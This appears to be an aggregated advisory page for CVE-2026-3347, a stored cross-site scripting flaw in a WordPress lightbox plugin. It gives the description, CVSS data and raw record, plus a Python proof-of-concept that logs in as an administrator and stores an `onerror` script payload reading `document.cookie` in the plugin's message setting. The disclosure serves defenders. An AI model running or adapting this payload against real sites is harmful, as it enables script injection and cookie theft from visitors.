Security Vulnerability Report
中文
CVE-2026-3347 CVSS 5.5 MEDIUM

CVE-2026-3347

Published: 2026-03-21 04:17:22
Last Modified: 2026-04-24 16:27:44
Source: [email protected]

Description

The Multi Functional Flexi Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `arv_lb[message]` parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This is due to the `arv_lb_options_val()` sanitize callback returning user input without any sanitization, and the stored `message` value being output in the `genLB()` function without escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses a page or post with the lightbox enabled.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Multi Functional Flexi Lightbox <= 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# WordPress Multi Functional Flexi Lightbox < 1.2 Stored XSS PoC # Target: The 'arv_lb[message]' parameter in the plugin settings. # Precondition: Attacker must have Administrator-level privileges. import requests # Configuration target_url = "http://example.com/wp-admin/admin.php?page=multi-functional-flexi-lightbox" login_url = "http://example.com/wp-login.php" username = "admin" password = "password" session = requests.Session() # 1. Authenticate to WordPress def login(): login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } response = session.post(login_url, data=login_data) if "wp-admin" in response.text: print("[+] Login successful") else: print("[-] Login failed") exit() # 2. Exploit the Stored XSS def exploit(): # Fetch the page to get nonces (if any) page = session.get(target_url) # The vulnerable parameter is arv_lb[message] # Payload: Simple alert to demonstrate execution payload_data = { 'arv_lb[message]': '<img src=x onerror=alert(document.cookie)>', 'Submit': 'Save Changes', 'option_page': 'arv_lb_options', 'action': 'update', '_wpnonce': '[INSERT_NONCE_IF_REQUIRED]', # Usually required for WP options '_wp_http_referer': '/wp-admin/admin.php?page=multi-functional-flexi-lightbox' } # Note: Real-world exploitation requires handling WordPress Nonces (_wpnonce) # This is a conceptual representation of the POST request. response = session.post(target_url, data=payload_data) if response.status_code == 200: print("[+] Payload sent. Check the plugin settings or view a post with the lightbox.") else: print(f"[-] Request failed with status {response.status_code}") if __name__ == "__main__": login() exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3347", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:17:21.730", "lastModified": "2026-04-24T16:27:44.277", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Multi Functional Flexi Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `arv_lb[message]` parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This is due to the `arv_lb_options_val()` sanitize callback returning user input without any sanitization, and the stored `message` value being output in the `genLB()` function without escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses a page or post with the lightbox enabled."}, {"lang": "es", "value": "El plugin Multi Functional Flexi Lightbox para WordPress es vulnerable a cross-site scripting almacenado a través del parámetro `arv_lb[message]` en todas las versiones hasta la 1.2, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto se debe a que la función de callback de sanitización `arv_lb_options_val()` devuelve la entrada del usuario sin ninguna sanitización, y el valor `message` almacenado se muestra en la función `genLB()` sin escape. Esto hace posible que atacantes autenticados, con acceso de nivel de Administrador, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página o entrada con el lightbox habilitado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/tags/1.2/options.php#L94", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/tags/1.2/sp.php#L37", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/trunk/options.php#L94", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/trunk/sp.php#L37", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4c0b14a-d039-4008-a433-ab3605e2612c?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.